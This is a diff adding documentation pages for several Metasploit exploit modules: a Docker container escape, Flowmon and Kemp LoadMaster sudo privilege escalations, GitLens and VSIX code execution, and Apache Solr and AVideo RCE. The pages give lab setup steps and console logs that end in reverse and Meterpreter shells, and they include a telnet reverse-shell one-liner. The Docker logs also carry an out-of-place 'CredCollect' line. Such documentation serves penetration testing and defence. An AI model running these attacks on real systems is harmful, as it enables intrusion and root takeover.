+### WritableContainerDir
+
+A directory where we can write files inside the container (default is `/tmp/.{rand(4)}`).
+This is needed to drop the payload into the container.
+
+### ReloadKernelModule
+
+Rebuilds and reloads kernel module if its already loaded in case of repeat runs.
+
+## Scenarios
+
+### Container Escape from debian linux with reverse bash
+
+```msf
+msf6 > sessions -i 1 -c "apt update && apt install -y gcc make kmod linux-headers-$(uname -r)"
+[*] Running 'apt update && apt install -y gcc make kmod linux-headers-$(uname -r)' on shell session 1 (192.168.56.126)
+msf6 > use exploit/linux/local/docker_privileged_container_kernel_escape 
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > set session 1 
+session => 1
+msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > check 
+[*] The target appears to be vulnerable. Inside Docker container and target appears vulnerable
+msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > exploit -z
+
+[*] [2023.11.07-21:42:40] Started reverse TCP handler on 192.168.56.1:4444 
+[*] [2023.11.07-21:42:42] Creating files...
+[*] [2023.11.07-21:42:43] Compiling the kernel module...
+[+] [2023.11.07-21:42:43] Kernel module compiled successfully
+[*] [2023.11.07-21:42:43] Loading kernel module...
+[*] Command shell session 3 opened (192.168.56.1:4444 -> 192.168.56.126:60974) at 2023-11-07 21:42:50 -0500
+[*] This is CredCollect, I have the conn!
+```
+
+### Container Escape from arch linux with meterpreter
+
+```msf
+msf6 > sessions -i 2 -c "pacman -Syy --noconfirm gcc glibc make linux-headers"
+[*] Running 'pacman -Syy --noconfirm gcc glibc make linux-headers' on shell session 2 (192.168.56.106)
+msf6 > use exploit/linux/local/docker_privileged_container_kernel_escape 
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > set session 2 
+session => 2
+msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp 
+payload => cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > set lhost vboxnet0 
+lhost => vboxnet0
+msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > check 
+[*] The target appears to be vulnerable. Inside Docker container and target appears vulnerable
+msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > exploit -z
+
+[*] [2023.11.07-21:48:40] Started reverse TCP handler on 192.168.56.1:4444 
+[*] [2023.11.07-21:48:41] Creating files...
+[*] [2023.11.07-21:48:43] Compiling the kernel module...
+[+] [2023.11.07-21:48:44] Kernel module compiled successfully
+[*] [2023.11.07-21:48:44] Loading kernel module...
+[*] [2023.11.07-21:48:44] Sending stage (3045380 bytes) to 192.168.56.106
+[*] Meterpreter session 4 opened (192.168.56.1:4444 -> 192.168.56.106:50402) at 2023-11-07 21:48:45 -0500
+[*] This is CredCollect, I have the conn!
+[*] Session 4 created in the background.
+```
@@ -46,7 +46,7 @@ The host `runc` binary will be overwritten during exploitation. The module
 takes care of making a backup before the overwrite and restoring it when the new
 session is established. However, it might not work as expected and something
 could go wrong during the exploitation, which might prevent the session being
-created. In this case, `runc` won't be restored and the the host will no longer
+created. In this case, `runc` won't be restored and the host will no longer
 be able to run Docker containers. This process will need to be done manually
 somehow by following the instruction displayed during the module execution:
 ```
@@ -0,0 +1,96 @@
+## Vulnerable Application
+Progress Flowmon up to at least version 12.3.2 is vulnerable to local privilege escalation from the
+`flowmon` user to `root`. This is possible due to the
+flowmon user being able to run several commands with
+`sudo`. This module exploits the ability to overwrite a
+PHP file and execute it with `sudo` granting full `sudo`
+permissions to the `flowmon` user and elevating the
+shell to a root shell.
+
+For more details on the vulnerability:
+https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/ (privesc methods)
+
+https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability
+
+This application is avaiable in cloud marketplaces:
+- https://portal.azure.com/#view/Microsoft_Azure_Marketplace/GalleryItemDetailsBladeNopdl/id/progresssoftwarecorporation.flowmon
+- https://aws.amazon.com/marketplace/pp/prodview-6phnrhkekuzka
+- https://console.cloud.google.com/marketplace/product/flowmon-public/flowmon-collector-for-google-cloud
+## Verification Steps
+1. Install the application
+1. Start msfconsole
+1. Gain a session on a Progress Kemp Loadmaster target as the `flowmon` user
+1. Do: `use exploits/linux/local/pprogress_flowmon_sudo_privesc_2024`
+1. Do: `set SESSION <session>`
+1. Do: `set LHOST <your host IP>`
+1. Do: `run`
+1. You should get a shell as the `root` user.
+
+## Scenarios
+
+### Flowmon 12.2
+
+```
+msf6 exploit(linux/local/progress_flowmon_sudo_privesc_2024) > sessions -l
+
+Active sessions
+===============
+
+  Id  Name  Type                   Information                                  Connection
+  --  ----  ----                   -----------                                  ----------
+  5         meterpreter x64/linux  flowmon @ localhost.localdomain.localdomain  192.168.2.23:4444 -> 192.168.2.26:38328 (192.168.2.26)
+
+msf6 exploit(linux/local/progress_flowmon_sudo_privesc_2024) > show options
+
+Module options (exploit/linux/local/progress_flowmon_sudo_privesc_2024):
+
+   Name          Current Setting  Required  Description
+   ----          ---------------  --------  -----------
+   SESSION       -1               yes       The session to run this module on
+   WRITABLE_DIR  /tmp             yes       A directory where we can write files
+
+
+Payload options (linux/x64/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.2.23     yes       The listen address (an interface may be specified)
+   LPORT  5555             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/local/progress_flowmon_sudo_privesc) > run
+
+[*] Started reverse TCP handler on 192.168.2.23:5555
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Found 2 indicators this is a Progress Flowmon product
+[!] The service is running, but could not be validated.
+[*] Saving payload as /tmp/.fovaiiazfuhl
+[*] Overwriting /var/www/shtml/index.php with payload
+[*] Executing sudo to elevate privileges
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 192.168.2.26
+[+] Deleted /tmp/.fovaiiazfuhl
+[*] Cleaning up addition to /etc/sudoers
+[*] Meterpreter session 9 opened (192.168.2.23:5555 -> 192.168.2.26:33408) at 2024-05-23 16:46:10 -0400
+[*] Restoring /var/www/shtml/index.php file contents...
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : localhost.localdomain.localdomain
+OS           : CentOS 7.9.2009 (Linux 3.10.0-1160.102.1.el7.flowmon.x86_64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```
@@ -0,0 +1,188 @@
+## Vulnerable Application
+Progress Kemp LoadMaster up to at least 7.2.59.2.22338.  The vendor is aware of this "feature," but
+has chosen not to change the behavior.  It was originally paired with CVE-2024-1212, but as this
+privilege escalation was not patched when CVE-2024-1212 was, we split it into its own module.
+This exploit/feature allows the default `bal` user to run several binaries with the `sudo` prefix
+that will elevate without prompting for a password.  As the configuration is based on filename and
+the `bal` user has write permissions to these files, the `bal` user can simply write over the existing
+binary with one of their choosing, then prefix it with `sudo` and launch the binary with `root`
+privileges.
+This module defaults to overwrite `/bin/loadkeys` with `/bin/bash`, though other binaries would work,
+too.
+
+For more details on the vulnerability:  
+https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster/
+
+https://support.kemptechnologies.com/hc/en-us/articles/23878931058445-LoadMaster-Security-Vulnerability-CVE-2024-1212
+
+A trial VM which the exploit should work against out of the box can be downloaded from:
+https://sso.kemptechnologies.com/register/kemp/vlm
+
+The AWS marketplace also has free trials which can be used. These require the "session management" to be enabled in order for the exploit to work. Since by default the admin WUI is behind basic auth.
+https://aws.amazon.com/marketplace/pp/prodview-kgh3dsfk7qcnw
+
+Because this is an appliance, there are limited commands available for command-based payloads.
+
+## Verification Steps
+1. Install the application
+1. Start msfconsole
+1. Gain a session on a Progress Kemp Loadmaster target as the `bal` user
+1. Do: `use exploits/linux/local/progress_kemp_loadmaster_sudo_privesc_2024`
+1. Do: `set SESSION <session>`
+1. Do: `set LHOST <your host IP>`
+1. Do: `run`
+1. You should get a shell as the `root` user.
+
+## Scenarios
+
+### LoadMaster 7.2.59.0.22007
+#### Metasploit Binary Dropper Payload
+```msf
+msf6 exploit(linux/local/progress_kemp_loadmaster_sudo_privesc_2024) > show options
+
+Module options (exploit/linux/local/progress_kemp_loadmaster_sudo_privesc_2024):
+
+   Name           Current Setting  Required  Description
+   ----           ---------------  --------  -----------
+   SESSION        1                yes       The session to run this module on
+   TARGET_BINARY  /bin/loadkeys    yes       The path for a binary file that has permission to auto-elevate.
+   WRITABLE_DIR   /tmp             yes       A directory where we can write files
+
+
+Payload options (linux/x64/meterpreter_reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  10.5.135.201     yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Dropper
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/local/progress_kemp_loadmaster_sudo_privesc_2024) > run
+
+[*] Started reverse TCP handler on 10.5.135.201:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Found 3 indicators this is a KEMP product
+[!] The service is running, but could not be validated.
+[*] Writing payload to /tmp/.rypuliojtdch
+[*] Moving /bin/loadkeys to /tmp/.qyiojnfbnfc
+[*] Moving /tmp/.rypuliojtdch to /bin/loadkeys
+[*] Running /bin/loadkeys
+[+] Deleted /tmp/.rypuliojtdch
+[*] Meterpreter session 2 opened (10.5.135.201:4444 -> 10.5.134.141:28850) at 2024-05-10 08:50:39 -0500
+[*] Moving /tmp/.qyiojnfbnfc to /bin/loadkeys
+[+] /bin/loadkeys returned to original contents
+
+meterpreter > sysinfo
+Computer     : 10.5.134.141
+OS           : SuSE 7.2 (Linux 4.14.137)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > getuid
+Server username: root
+meterpreter > 
+
+
+```
+
+#### Reverse Bash Command Payload
+```msf
+msf6 exploit(linux/local/progress_kemp_loadmaster_sudo_privesc_2024) > show options
+
+Module options (exploit/linux/local/progress_kemp_loadmaster_sudo_privesc_2024):
+
+   Name           Current Setting  Required  Description
+   ----           ---------------  --------  -----------
+   SESSION        1                yes       The session to run this module on
+   TARGET_BINARY  /bin/loadkeys    yes       The path for a binary file that has permission to auto-elevate.
+   WRITABLE_DIR   /tmp             yes       A directory where we can write files
+
+
+Payload options (cmd/unix/reverse):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  10.5.135.201     yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/local/progress_kemp_loadmaster_sudo_privesc_2024) > run
+
+[+] sh -c '(sleep 4376|telnet 10.5.135.201 4444|while : ; do sh && break; done 2>&1|telnet 10.5.135.201 4444 >/dev/null 2>&1 &)'
+[*] Started reverse TCP double handler on 10.5.135.201:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Found 3 indicators this is a KEMP product
+[!] The service is running, but could not be validated.
+[*] Preparing payload command
+[*] Moving /bin/loadkeys to /tmp/.mnqdvfwutfd
+[*] Moving /bin/bash to /bin/loadkeys
+[*] Running payload command
+[*] Accepted the first client connection...
+[*] Accepted the second client connection...
+[*] Command: echo igZFhKRnh9GplIdu;
+[*] Writing to socket A
+[*] Writing to socket B
+[*] Reading from sockets...
+[*] Reading from socket A
+[*] A: "sh: line 2: Connected: command not found\r\nsh: line 3: Escape: command not found\r\nigZFhKRnh9GplIdu\r\n"
+[*] 
+[*] Moving /tmp/.mnqdvfwutfd to /bin/loadkeys
+[*] Matching...
+[*] B is input...
+[+] /bin/loadkeys returned to original contents
+
+ls
+azurelinuxagent
+bin
+cgroup
+dev
+dmZPnkPUPoV
+etc
+initial_setup.sh
+lib
+lib64
+lost+found
+mnt
+one4net
+openssl
+proc
+root
+sbin
+sks
+sys
+tmp
+user
+usr
+var
+touch tempfile
+ls -l
+total 51
+drwxr-xr-x   5 root root  1024 Mar 22  2023 azurelinuxagent
+.
+.
+.
+-rw-r--r--   1 root root     0 May  3 17:02 tempfile
+.
+.
+drwxr-xr-x  12 root root  1024 Mar 21 17:29 var
+```
@@ -0,0 +1,95 @@
+## Vulnerable Application
+
+GitKraken GitLens before v.14.0.0 allows an untrusted workspace to execute git
+commands. A repo may include its own .git folder including a malicious config file to
+execute arbitrary code.
+
+Tested against VSCode 1.87.2 with GitLens 13.6.0 on Ubuntu 22.04 and Windows 10
+
+### Install
+
+Download the extension [gitlens-13.6.0.vsix](https://github.com/gitkraken/vscode-gitlens/releases/download/v13.6.0/gitlens-13.6.0.vsix)
+
+1. In VSCode, go to extensions (left side, 4 blocks), click triple dots in top right corner, Auto Update Extensions -> None.
+1. In VSCode, go to extensions (left side, 4 blocks), click triple dots in top right corner, install from vsix.
+
+## Verification Steps
+
+1. Install the extension
+1. Start msfconsole
+1. Do: `use exploit/multi/fileformat/gitlens_local_config_exec`
+1. Do: `run`
+1. Unzip the repo
+1. Open the folder in Visual Studio Code
+1. When prompted, select "No, I don't trust the authors"
+1. Open the `README.md` file and put the cursor on the first line.
+1. You should get a shell.
+
+## Options
+
+### README
+
+The content of the `README.md` file. Defaults to `# Test`
+
+## Scenarios
+
+### VSCode 1.87.2 on Windows 10 Pro (22H2) with GitLens 13.6.0
+
+```
+[*] Processing gitlens.rb for ERB directives.
+resource (gitlens.rb)> use exploit/multi/fileformat/gitlens_local_config_exec
+[*] Using configured payload cmd/unix/reverse_bash
+resource (gitlens.rb)> set target 1
+target => 1
+resource (gitlens.rb)> set lhost 192.168.10.147
+lhost => 192.168.10.147
+msf6 exploit(multi/fileformat/gitlens_local_config_exec) > exploit
+
+[*] Started reverse TCP handler on 192.168.10.147:4444 
+[+] repo.zip stored at /root/.msf4/local/repo.zip
+[*] Waiting for shell
+```
+
+Unzip the repo, open the folder in Visual Studio Code. When prompted, select "No, I don't trust the authors". Open the `README.md` file and put the cursor on the first line.
+
+```
+[*] Sending stage (336 bytes) to 192.168.10.100
+[*] Command shell session 1 opened (192.168.10.147:4444 -> 192.168.10.100:62807) at 2024-03-19 17:46:46 +0000
+
+
+Shell Banner:
+Microsoft Windows [Version 10.0.19045.4170]
+-----
+          
+
+C:\Users\h00die\Desktop\repo>whoami
+whoami
+h00die
+
+C:\Users\h00die\Desktop\repo>
+```
+### VSCode 1.87.2 on Windows 10 Pro (1809), utilizing remote connection to Ubuntu 22.04 with GitLens 13.6.0 installed
+
+```
+$ ./msfconsole -qr gitlens.rb 
+[*] Processing gitlens.rb for ERB directives.
+resource (gitlens.rb)> use exploit/multi/fileformat/gitlens_local_config_exec
+[*] Using configured payload cmd/unix/reverse_bash
+resource (gitlens.rb)> set lhost 192.168.10.147
+lhost => 192.168.10.147
+msf6 exploit(multi/fileformat/gitlens_local_config_exec) > exploit
+
+[*] Started reverse TCP handler on 192.168.10.147:4444 
+[+] repo.zip stored at /root/.msf4/local/repo.zip
+[*] Waiting for shell
+```
+
+Unzip the repo, open the folder in Visual Studio Code. When prompted, select "No, I don't trust the authors". Open the `README.md` file and put the cursor on the first line.
+
+```
+[*] Command shell session 1 opened (192.168.10.147:4444 -> 192.168.10.147:53600) at 2024-03-19 18:26:04 +0000
+
+[*] Command shell session 2 opened (192.168.10.147:4444 -> 192.168.10.147:53612) at 2024-03-19 18:26:06 +0000
+id
+uid=1000(notroot) gid=1000(notroot) groups=1000(notroot),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),119(docker)
+```
@@ -0,0 +1,66 @@
+## Vulnerable Application
+
+Creates a vsix file which can be installed in Visual Studio Code as an extension.
+At activation/install, the extension will execute a shell or two.
+
+Tested against VSCode 1.87.2 on Ubuntu 22.04
+
+## Verification Steps
+
+1. Install VSCode
+1. Start msfconsole
+1. Do: `use exploit/multi/fileformat/visual_studio_vsix_exec`
+1. Do: `set lhost [IP]`
+1. Do: `run`
+1. In Visual Studio, click the extensions button on the left (4 boxes with the top
+right one offset)
+1. Click the 3 dots in the new window, select `Install from VSIX...`.
+1. Click the extension
+1. You should get a shell or two
+
+## Options
+
+### NAME
+
+The name of the extension. Defaults to `Code Reviewer`
+
+### DESCRIPTION
+
+The description of the extension. Defaults to `Reviews code`
+
+### VERSION
+
+The version of the extension. Defaults to `0.0.1`
+
+### README
+
+The readme contents for the extension. Defaults to ``
+
+## Scenarios
+
+### VSCode 1.87.2 on Ubuntu 22.04
+
+```
+msf6 > use exploit/multi/fileformat/visual_studio_vsix_exec
+[*] Using configured payload nodejs/shell_reverse_tcp
+msf6 exploit(multi/fileformat/visual_studio_vsix_exec) > set lport 5989
+lport => 5989
+msf6 exploit(multi/fileformat/visual_studio_vsix_exec) > set lhost 111.111.11.111
+lhost => 111.111.11.111
+msf6 exploit(multi/fileformat/visual_studio_vsix_exec) > exploit
+
+[*] Started reverse TCP handler on 111.111.11.111:5989 
+[+] extension.vsix stored at /root/.msf4/local/extension.vsix
+[*] Waiting for shell
+[*] Command shell session 1 opened (111.111.11.111:5989 -> 111.111.11.111:33070) at 2024-03-22 17:22:16 +0000
+
+[*] Command shell session 2 opened (111.111.11.111:5989 -> 111.111.11.111:33080) at 2024-03-22 17:22:16 +0000
+whoami
+h00die
+id
+uid=1000(h00die) gid=1000(h00die) groups=1000(h00die),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),119(docker)
+code -v   
+1.87.2
+863d2581ecda6849923a2118d93a088b0745d9d6
+x64
+```
@@ -0,0 +1,279 @@
+## Vulnerable Application
+
+Apache Solr from 6.0.0 through 8.11.2, from 9.0.0 before 9.4.1 is affected by an Unrestricted Upload of File
+with Dangerous Type vulnerability which can result in remote code execution in the context of the user running
+Apache Solr. When Apache Solr creates a Collection, it will use a specific directory as the classpath and load
+some classes from it. The backup function of the Collection can export malicious class files uploaded by
+attackers to the directory, allowing Solr to load custom classes and create arbitrary Java code. Execution
+can further bypass the Java sandbox configured by Solr, ultimately causing arbitrary command execution.
+
+### Setup
+
+Install a vulnerable instance of Apache Solr with the following docker-compose file. The instance must be running in 
+"Cloud mode" in order to be vulnerable which is why the `-c` argument is included in the `solr start` command.
+
+#### Apache Solr 9.0.0 (no Authentication)
+```yml
+version: '3'
+
+services:
+  solr:
+    image: solr:9.0.0
+    ports:
+      - "8983:8983"
+      - "5005:5005"
+    command: sh -c "solr start -c -a '-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=*:5005' && tail -f /dev/null"
+```
+
+#### Apache Solr with Authentication
+
+If Apache Solr is being run in Cloud mode with the Basic Authentication plugin then the `security.json` file must be 
+uploaded to zookeeper as explained in the following [documentation](https://solr.apache.org/guide/8_1/basic-authentication-plugin.html).
+This is why the following `docker-compose.yml` spins up an additional zookeeper image. 
+
+This is the directory structure that should be followed in order for the `docker-compose.yml` file to find the `security.json`
+file without any issues:
+```
+msfuser@msfuser-virtual-machine:~/solr/auth_docker$ tree
+.
+├── docker-compose.yml
+└── solr-cloud
+    └── security.json
+
+1 directory, 2 files
+```
+
+The following `security.json` file can be used for testing purposes. The file will create a user: `solr` with the
+the password: `SolrRocks`.
+
+```json
+{
+"authentication":{
+   "blockUnknown": true,
+   "class":"solr.BasicAuthPlugin",
+   "credentials":{"solr":"IV0EHq1OnNrj6gvRCwvFwTrZ1+z1oBbnQdiVC3otuq0= Ndd7LKvVBAaZIF0QAVi1ekCfAJXr1GGfLtRUXhgrF8c="},
+   "realm":"My Solr users",
+   "forwardCredentials": false
+},
+"authorization":{
+   "class":"solr.RuleBasedAuthorizationPlugin",
+   "permissions":[{"name":"security-edit",
+      "role":"admin"}],
+   "user-role":{"solr":"admin"}
+}}
+```
+
+
+```yml
+version: '3'
+services:
+  solr1:
+    image: solr:9.0.0
+    container_name: mysite-solr1
+    restart: always
+    ports:
+      - "8983:8983"
+    environment:
+      SOLR_OPTS: -Djute.maxbuffer=50000000
+      ZK_HOST: mysite-zoo1:2181
+      SOLR_HEAP: 1g
+    labels:
+      - 'traefik.backend=solr'
+      - 'traefik.port=8983'
+      - 'traefik.frontend.rule=Host:solr.mysite.localhost'
+    depends_on:
+      - zoo1
+    volumes:
+      - ./solr-cloud/security.json:/var/security.json
+      - .:/mnt/config
+      - solr1:/var/solr
+    command: bash -c "docker-entrypoint.sh solr zk cp file:/var/security.json zk:/security.json && exec solr-foreground"
+
+  zoo1:
+    image: zookeeper:3.6
+    container_name: mysite-zoo1
+    hostname: mysite-zoo1
+    restart: always
+    expose:
+      - 2181
+      - 7000
+    environment:
+      JVMFLAGS: -Djute.maxbuffer=50000000
+      ZOO_MY_ID: 1
+      ZOO_SERVERS: server.1=mysite-zoo1:2888:3888;2181
+      ZOO_4LW_COMMANDS_WHITELIST: mntr, conf, ruok
+      ZOO_CFG_EXTRA: "metricsProvider.className=org.apache.zookeeper.metrics.prometheus.PrometheusMetricsProvider metricsProvider.httpPort=7000 metricsProvider.exportJvmInfo=true"
+    volumes:
+      - .:/mnt/config
+volumes:
+  solr1:
+```
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use apache_solr_backup_restore`
+1. Set the `RHOST`, `LHOST` and if required, the `USERNAME`, and `PASSWORD` options
+1. Run the module
+1. Receive a Meterpreter session as the `solr` user.
+
+## Scenarios
+### Apache Solr 9.0.0 (no Authentication)
+
+```
+msf6 > use linux/http/apache_solr_backup_restore
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/apache_solr_backup_restore) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf6 exploit(linux/http/apache_solr_backup_restore) > set lhost 172.16.199.1
+lhost => 172.16.199.1
+msf6 exploit(linux/http/apache_solr_backup_restore) > options
+
+Module options (exploit/linux/http/apache_solr_backup_restore):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   PASSWORD                    no        Solr password
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     127.0.0.1        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.ht
+                                         ml
+   RPORT      8983             yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  solr             no        Path to Solr
+   USERNAME   solr             no        Solr username
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      GCPCPUvxM        no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR  /tmp/            yes       Remote writable dir to store payload; cannot contain spaces
+   LHOST               172.16.199.1     yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/apache_solr_backup_restore) > run
+
+[*] Started reverse TCP handler on 172.16.199.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Running check method
+[*] 127.0.0.1:8983: Authentication not required
+[*] Found Apache Solr 9.0.0
+[*] OS version is Linux amd64 6.6.16-linuxkit
+[+] The target appears to be vulnerable. Found Apache Solr version: 9.0.0
+[+] Uploaded configuration successfully
+[+] Backed up collection successfully
+[+] Backed up collection successfully
+[+] Uploaded configuration successfully
+[*] Sending stage (3045380 bytes) to 172.16.199.1
+[+] Successfully dropped the payload
+[*] Meterpreter session 12 opened (172.16.199.1:4444 -> 172.16.199.1:50057) at 2024-04-01 16:18:17 -0700
+[*] Cleaning up...
+
+meterpreter > getuid
+Server username: solr
+meterpreter > sysinfo
+Computer     : 192.168.128.2
+OS           : Ubuntu 20.04 (Linux 6.6.16-linuxkit)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```
+
+### Apache Solr 9.0.0 with Authentication
+```
+msf6 exploit(linux/http/apache_solr_backup_restore) > set password SolrRocks
+password => SolrRocks
+msf6 exploit(linux/http/apache_solr_backup_restore) > set username solr
+username => solr
+msf6 exploit(linux/http/apache_solr_backup_restore) > set rhost 172.16.199.132
+rhost => 172.16.199.132
+msf6 exploit(linux/http/apache_solr_backup_restore) > set lhost 172.16.199.1
+lhost => 172.16.199.1
+msf6 exploit(linux/http/apache_solr_backup_restore) > options
+
+Module options (exploit/linux/http/apache_solr_backup_restore):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   PASSWORD   SolrRocks        no        Solr password
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     172.16.199.132   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.ht
+                                         ml
+   RPORT      8983             yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  solr             no        Path to Solr
+   USERNAME   solr             no        Solr username
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      dkNrXBirxJx      no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR  /tmp/            yes       Remote writable dir to store payload; cannot contain spaces
+   LHOST               172.16.199.1     yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/apache_solr_backup_restore) > run
+
+[*] Started reverse TCP handler on 172.16.199.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Running check method
+[*] Found Apache Solr 9.0.0
+[*] OS version is Linux amd64 6.5.0-26-generic
+[+] The target appears to be vulnerable. Found Apache Solr version: 9.0.0
+[+] Uploaded configuration successfully
+[+] Backed up collection successfully
+[+] Backed up collection successfully
+[+] Uploaded configuration successfully
+[*] Sending stage (3045380 bytes) to 172.16.199.132
+[+] Successfully dropped the payload
+[*] Meterpreter session 14 opened (172.16.199.1:4444 -> 172.16.199.132:41742) at 2024-04-01 16:25:16 -0700
+[*] Cleaning up...
+
+meterpreter > getuid
+Server username: solr
+meterpreter > sysinfo
+Computer     : 172.21.0.3
+OS           : Ubuntu 20.04 (Linux 6.5.0-26-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```
@@ -0,0 +1,139 @@
+## Vulnerable Application
+
+This Metasploit module exploits an unauthenticated Remote Code Execution vulnerability in the AVideo platform,
+specifically within the WWBNIndex plugin.
+The vulnerability exists due to improper input validation in the `submitIndex.php` file, where the `systemRootPath` parameter
+is directly passed to a `require()` PHP function without proper sanitization.
+Attackers can exploit this by leveraging the PHP filter chaining technique
+to execute arbitrary PHP code on the server.
+The vulnerability is present in versions from 12.4 up to 14.2.
+
+To set up a vulnerable environment for testing, follow the installation steps provided in the AVideo documentation for running with Docker:
+<https://github.com/WWBN/AVideo/wiki/Running-AVideo-with-Docker>.
+Ensure AVideo version installed is between 12.4 and 14.2 and the WWBIndex plugin is installed.
+This can be done by verifying `/var/www/html/AVideo/plugin/WWBNIndex` exists.
+
+## Verification Steps
+
+1. Start `msfconsole` in your Metasploit framework.
+2. Use the module: `use exploit/multi/http/avideo_wwbnindex_unauth_rce`.
+3. Set `RHOSTS` to the target's address where the AVideo platform is installed.
+4. Set `TARGETURI` to the base path of the AVideo installation if it is not at the root directory (default is `/`).
+5. Optionally, configure other options such as `SSL` and `RPORT` if the target environment requires it.
+6. Execute the exploit using the `run` or `exploit` command.
+7. If the target is vulnerable, the module will execute the specified payload, granting access according to the payload's capabilities.
+
+## Options
+
+No options
+
+## Scenarios
+
+### Successful Exploitation against AVideo Platform with WWBNIndex plugin version 12.9
+
+**Setup**:
+
+- Target: AVideo platform with WWBNIndex plugin version 12.9 installed in a Docker container.
+- Attacker: Metasploit Framework.
+
+**Example**:
+
+```
+msf6 > search avideo
+
+Matching Modules
+================
+
+   #  Name                                            Disclosure Date  Rank       Check  Description
+   -  ----                                            ---------------  ----       -----  -----------
+   0  exploit/multi/http/avideo_wwbnindex_unauth_rce  2024-04-04       excellent  Yes    AVideo WWBNIndex Plugin Unauthenticated RCE
+   1    \_ target: Automatic                          .                .          .      .
+   2    \_ target: PHP In-Memory                      .                .          .      .
+   3    \_ target: Unix In-Memory                     .                .          .      .
+   4    \_ target: Windows In-Memory                  .                .          .      .
+
+
+Interact with a module by name or index. For example info 4, use 4 or use exploit/multi/http/avideo_wwbnindex_unauth_rce
